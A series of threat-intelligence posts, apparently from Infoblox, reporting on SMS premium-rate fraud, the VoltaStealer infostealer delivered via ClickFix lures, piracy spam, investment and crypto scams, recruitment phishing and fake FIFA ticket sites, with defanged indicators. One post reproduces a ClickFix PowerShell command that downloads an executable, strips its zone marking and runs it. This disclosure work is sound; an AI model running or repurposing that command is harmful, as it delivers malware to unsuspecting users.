One tap to continue watching. Also: one tap to charge your phone bill €4.50. Click2SMS, what good are you, anyway?

A redirect chain took us from a compromised legitimate site, through help_tds, then through a familiar Germany-based commercial TDS, to hmtraff[.]com where we finally arrived at d[.]gosmartdecision[.]com — part of an IRSF ecosystem we've been tracking since our fake CAPTCHA report.

The landing page shows a fake video player. A large "Continue" button sits in front of it. That button is <a href="sms:81183?body=360 *CWZQ...">. One tap opens the SMS app, pre-loaded with a message to a premium-rate French shortcode. 4.50 EUR per code.

Where the fake CAPTCHA required four separate actions to maintain a verification illusion, the video player needs one. Simpler, faster, probably more effective. The legal disclosure with the price is below the fold in 10pt text, while the large "Continue" button is in the middle of the screen.

There's a second bonus layer: the page runs device fingerprinting and injects a credit card collection form for non-mobile visitors — cardholder name, number, CVV, expiry. Mobile French users see the Click2SMS flow. Others may get card phishing. Two modes. One domain. DNS-visible delivery chain throughout.

hmtraff[.]com
d[.]gosmartdecision[.]com

Final landing page: https://urlscan.io/result/019f14b2-c99e-7677-a742-61f7c814b545/

Prior report: https://www.infoblox.com/blog/threat-intelligence/hold-the-phone-international-revenue-share-fraud-driven-by-fake-captchas/

#dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #smishing #tds #irsf

d.gosmartdecision.com - urlscan.io

urlscan.io - Website scanner for suspicious and malicious URLs

👻 VoltaStealer was basically a ghost story. A slick, evasion-obsessed new infostealer hyped by its author on dark web forums, but no one reported seeing one in the wild, until now.

While tracking a ClickFix actor, we pivoted on a known IOC into an open directory holding a very interesting payload. Artifacts and circumstantial evidence point to one suspect: VoltaStealer. We believe this is the first known sample. 🔬

The delivery is textbook verification and fatigue bait: fraudulent sites dressed up as "security checks" and fake CAPTCHAs. Tick the "I'm not a robot" box and the page silently copies a malicious PowerShell one-liner to your clipboard. The ClickFix lure page then instructs victims to open the Windows Run dialog and enter the paste hotkey command, which fetches the malware. No exploit required, just a checkbox and trust. 🤖

What VoltaStealer claims it can do (per its own MaaS sales pitch, surfaced via Axur's dark web monitoring):
🔴 Runs fully in memory — custom encryption/obfuscation, minimal disk artifacts
🔴 Heavy evasion — anti-VM/sandbox/debug, direct syscalls, runtime FUD, ~75% build uniqueness, chunked exfil to stay quiet
🔴 Grabs everything — passwords, cookies, auth tokens, browser + desktop crypto wallets, Telegram sessions, VPN configs, and files via regex scanning
🔴 Fast & greedy — 5–10s execution, ~95% "hit rate" claim, partial upload even if interrupted, no persistence
🔴 Full storefront — web panel + builder, dashboards, API, team roles, clipper/loader/file-grabber modules, tiered subs

In other words: vapor no more. 💨

⛔ VoltaStealer C2:
usevolta[.]su

⛔ VoltaStealer Payloads (SHA256):
2be779fc085dd89cf9e042cbcf32ee6da0cd0e3106e9dca49d52b7a839b1aa8f
253f53b2453f8bff642421cfa5d851af8fc7100409397d80643bd792a7e38edb

⛔ ClickFix PowerShell command (Not VoltaStealer):
command: "powershell -nop -w h -ep bypass -c \"$u='hXXps[:]//plonkert[.]cfd/de372ad5.exe';$f=$env:TEMP+'\\\\x.exe';$w=[Net.WebClient]::new();$w.('Down'+'loadFile')($u,$f);Unblock-File $f -EA 0;ri ($f+':Zone.Identifier') -EA 0;$env:SEE_MASK_NOZONECHECKS=1;& $f"

⛔ Malware payload (Not VoltaStealer) dropped via ClickFix malicious command (SHA256):
6a6f16d7202e64fea38a757b5151a39099124a1bf55ba55e62d58f3ae102f7e8

⛔ ClickFix actor domains:
comalign[.]pro
zorivian[.]pro
nexalora[.]pro
kovraxis[.]com
mevrio[.]com
krebbo[.]world
wobblify[.]cfd
yovu[.]world
glimmerix[.]pro
launcherpatch[.]com
grembix[.]cfd
wumlo[.]shop
plonkert[.]cfd
volpo[.]cfd
fleepax[.]cfd
zixlo[.]cfd
quobnar[.]world
riotmourner[.]pro
youfound[.]fun

Rule of thumb: real CAPTCHAs don't ask you to open the Windows Run dialog and paste in a command. If one does, close the page. 🛑

#dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #clickfix #infostealer #voltastealer #maas #malware #captcha #axur

🚨 📡 🇯🇵 Free TV in Japan, at a Cost: "Black-CAS" Spam Campaigns

We've been tracking a high-volume spam campaign targeting Japanese users advertising illegal "Black-CAS" services. In Japan, satellite TV channels are accessed through Conditional Access Systems (CAS), the legitimate pay-per-channel infrastructure used by Japanese broadcasters. Black-CAS exploits that system, intercepting and cloning legitimate smartcard signals to unlock paid content without a subscription.

Beyond the piracy angle, these devices have been documented to come preloaded with malware and residential proxy clients — buyers think they're paying for cheap TV access, but they're also handing over their network to threat actors.

The emails rotate Japanese-language subjects like "簡単に明日からタダになる、魔法のカード" ("a magic card that makes everything free starting tomorrow") or "有料放送が、ずっとただ無料です" ("paid broadcasts, free forever"). Every email carries a set of URL shortener links (clck[.]ru, u[.]to) rather than direct destination URLs — a clear detection evasion mechanism.

The protective shortener layer hasn't made them conservative with the number of domain registrations. Behind it, the infrastructure relies heavily on RDGAs (e.g. mchj43nmd4j53[.]xyz, 87dsq65dh3[.]xyz), while bolder actors directly use overtly themed domains: blackbcas[.]xyz, black-cas-card-tv[.]lol, black-cas-card-jp-super[.]xyz.

At the landing pages, users can directly purchase these devices, as seen in the images below.

This week our data puts Black-CAS alongside phishing and fake shop campaigns in the top threats targeting Japanese speakers — definitely a threat to consider.

#dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #illegalstreaming #asia #japan #blackCAS #tv #malware #residentialproxy #spam #rdga #サイバーセキュリティ #情報セキュリティ #マルウェア #迷惑メール #ブラックCAS

We've written about Keitaro-based cloaking before, and the investment scam ecosystem abusing it remains as active as ever.

🚨 New campaigns continue to blend fake news/investment opportunity lures with global brand impersonation (SoftBank, Channel NewsAsia, CNN Brasil, etc.), paired with tightly controlled cloaking to target victims by region.

The campaign setup is all too familiar:

- Traffic cloaking with Keitaro: Operators use multiple Keitaro accounts to segment campaigns by geography and filter out non-targeted traffic
- Layered social engineering: Fake media narratives build credibility before directing users to investment or crypto registration forms
- Ad-driven distribution: Campaigns use Facebook and Twitter ads to drive victims to scam pages
- Reusable JavaScript kits: Pages deploy Russian-language scripts with fingerprinting and strict validation checks to vet victims
- TDS routing: TDS redircts funnel users who pass validation to fake or sketchy investment platforms or "advisor callback" pages

The consistency of this approach shows how effective and repeatable these techniques remain for driving victim engagement at scale.

Domain sample: justa-solvendaria-es[.]online, newstable[.]online, newsmini18[.]shop, news66[.]shop, news444[.]shop, news534[.]shop, smartrock24[.]shop, timeshe[.]shop

#dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #scam #keitaro #investmentscam #tds #cloaking

This is not FIFA. This is a domain hijacked by Hazy Hawk. Probably serving up residential proxyware. Definitely nothing good. check your DNS for lame nameserver delegations.

#dns #phishing #residentialproxy #infobloxthreatIntel #infoblox #worldcup #illegalstreaming

Having trouble finding a free 📺 streaming site for World Cup 🏟️ matches? This threat actor has you covered with thousands of websites for all 104 matches! ⚽

We've been tracking a likely Vietnam-based actor that mass purchases expired domains (we call these dropcatch) and repurposes their existing web traffic to funnel visitors into illegal sports streaming sites, and then straight into a betting platform the same actor operates. The domain portfolio is a graveyard of real internet history: 2026worldcupnorthamerica[.]com (once cited by the Dallas Morning News and the US Men's National Team Facebook fan page), childreninachangingclimate[.]org (formerly a children's aid program), thebreastcancercharities[.]org (formerly non-profit The Breast Cancer Charities of America), and a domain officially used by major US grocery store chains involved in a large proposed merger. Collectively, this actor has spent hundreds of thousands of dollars acquiring dropcatch domains alone — a strong signal that dropcatching is a genuinely effective vehicle for cyber fraud. Behind all of it sits a staggering tech stack operated by a single actor: 5,000+ domains, illegal streaming services, CDNs, TDSs, trackers, cloakers, betting platforms, and mobile apps. That's not a side hustle, that's an enterprise. 🏗️

While the platform largely targets Vietnamese-speaking users, as well as others in Asia and Oceania, the financial damage reaches much further. Sports authorities and broadcasters worldwide are 📉 losing revenue every time someone watches a live NBA 🏀 , MLB ⚾ :, esports 🎮 , poker 🃏 , or World Cup 🏆 match for free on one of these sites, and this actor has all of them covered.

Some examples from the domains we've uncovered so far:

:Dropcatch domains host or redirect to illegal streaming services

autoredistrict[.]org
childreninachangingclimate[.]org
2026worldcupnorthamerica[.]com
folsomprisonmuseum[.]org
allaboutbasketball[.]us
thebreastcancercharities[.]org

:Fraudulent domains host or redirect to illegal streaming services

90phutaa[.]cc
90phutab[.]cc
90phutac[.]cc
xoilaczzzzw[.]tv
xoilaczzzzt[.]tv
xoilaczzzzh[.]tv

:Lookalike domains used by the betting platforms

fifa001[.]com
fifa002[.]com
fifa02[.]com
worldcup00[.]com
worldcup000[.]com
worldcup02[.]com

#dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #dropcatch #malvertising #illegalstreaming #sportsbetting #domainabuse #vietnam #worldcup #asia #fifa #streaming #betting #2026worldcup #charities #nonprofit #lookalike #xoilac #90phut

65% - that's how many of our Threat Defense Cloud customers have been observed accessing residential proxy services. But how many of them are aware of this?
Our latest report is a deep dive into the growing phenomenon we call 'resproxies'. Resproxies, which are often embedded in Android IoT devices, or baked into "free" applications, may be running in your environment, granting access to your own IP space, or even worse, like in the case of Kimwolf, granting access to your internal network. Turns out "bring your own device" sometimes means "bring your own residential proxy." 😬

Our new research (with @synthient who covered what happens on the other end):
🔗 https://www.infoblox.com/blog/threat-intelligence/residential-proxies-in-the-wild/
#dns #threatintel #threatintelligence #cybercrime #cyber #cybersecurity #infosec #infoblox #infobloxthreatintel #residentialproxy #resproxy

Examining residential proxies in Infoblox customer networks

Infoblox Threat Intel poses the question to network defenders: “Do you know who has access to your IP space?” with a look into residential proxy traffic.

Infoblox Blog
Threat actors are leveraging shared infrastructure together with subdomain abuse to control and serve hundreds of malicious websites with minimal management.

This week we were investigating a cluster of crypto brand lookalike domains.Through subdomain abuse – often powered by wildcard DNS configurations – just 34 registered domains expand to over 500 scam sites.

Investigating website content across that cluster allowed us to find several additional clusters running the same playbook. Thousands of domains on them.

This initial cluster impersonated dozens of brands — Binance, Coinbase, Kraken, KuCoin, Bybit, Bitmart. Several of these sites push fake app downloads, making malware delivery and crypto wallet theft a likely component of the broader operation.

A sample of the domains associated:

cryptocoinsx[.]cfd
bmarkit[.]com
zznyusbsgo.bitmart[.]pw
4pzyy6n7log71mm0.bitmarts[.]cc
5etxkk2aeh8jfgl0.bitstamptc[.]com

#dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #Phishing #Scams #malware #crypto #lookalikes #subdomains #iocs

Boss too tough? Salary too low? If you're after a new gig, look no further 💼

We’re tracking a recruitment‑themed phishing campaign that opens with hope of a career upgrade and ends in stolen credentials.

Victims are targeted through emails spammed out by “recruiters” impersonating real people — LinkedIn profiles copied in full, including photos and current recruiter identities. The lure leans on exciting big‑name brands including FIFA, UEFA, Nike and Spotify to anchor legitimacy before prompting victims to schedule an interview using a bogus Calendly page 👔 💫

About time they noticed your stellar performance, right? But this interview comes with a catch 🎣 To seal the deal, you'll need to log in with your company email.

The mechanics:
• Initial outreach primes the role and rapport with some feel-good shmoozing
• Link to schedule your interview lands on a cloned Calendly recruitment portal
• Follow‑on contact nudges the victim through staged redirects
• Your credentials submit their 30-day notice ⚠️

Behind the scenes:
• Convincing lookalike domains generated at scale (RDGAs), rotated aggressively
• Layered redirect chains to blur origin and intent
• Compromised or fraudulently obtained Salesforce Marketing Cloud used for delivery, helping mails sail past controls
• Lure pages clone the Pinpoint ATS — attribution supported by Pinpoint’s own Cloudinary account ID (pinpointhq) embedded in assets
• Domain validation logic limits logins to business email providers, excluding free webmail services

Sad to say, the only thing getting “shortlisted” here is your inbox for another round of credential theft.

IOCs
• brand-jobs[.]com
• brand-careers[.]com
• hr-brand[.]com
• brand-talenthub[.]com

These campaigns remain active, with the actor spinning up new lures impersonating other major brands. We regret to inform you, it seems they'll be moving forward with other candidates 😩

Better luck next time.

#dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #phishing

⚽ Looking for FIFA World Cup tickets without the queue?

We're continuously tracking a surge in convincing FIFA lookalike sites we first posted on last month, but this isn't your typical phishing game — it's full‑blown counterfeit ticketing, run like a high‑volume e‑commerce operation.

Premier League theatrics. Sunday league legitimacy 🎭

The flow:
• Land on a polished FIFA clone
• Auto‑localized content (language, region, pricing)
• "Checkout" pushed through rotating payment domains

Behind the curtain:
• ⚡ High domain churn — fresh registrations daily
• 🔄 Payment infrastructure swapped in/out to dodge disruption
• 🪞 Near-perfect mirroring of official FIFA content

There are indicators pointing to Chinese‑origin operators (hosting patterns, code artifacts), but targeting is global—and scalable.

The interesting bit? This isn't about stealing creds.

It's about conversion at scale. Auto-localisation + disposable infrastructure = throughput over stealth.

No ticket. No refund. Reliable revenue stream.

While this actor keeps kickin' and churning out new domains, we'll be here tracking the infrastructure... and yes it's because we can't afford a real ticket to the game.

#dns #threatintel #cybersecurity #infosec #scam #phishing #infoblox #infobloxthreatintel #WorldCup2026 #FIFA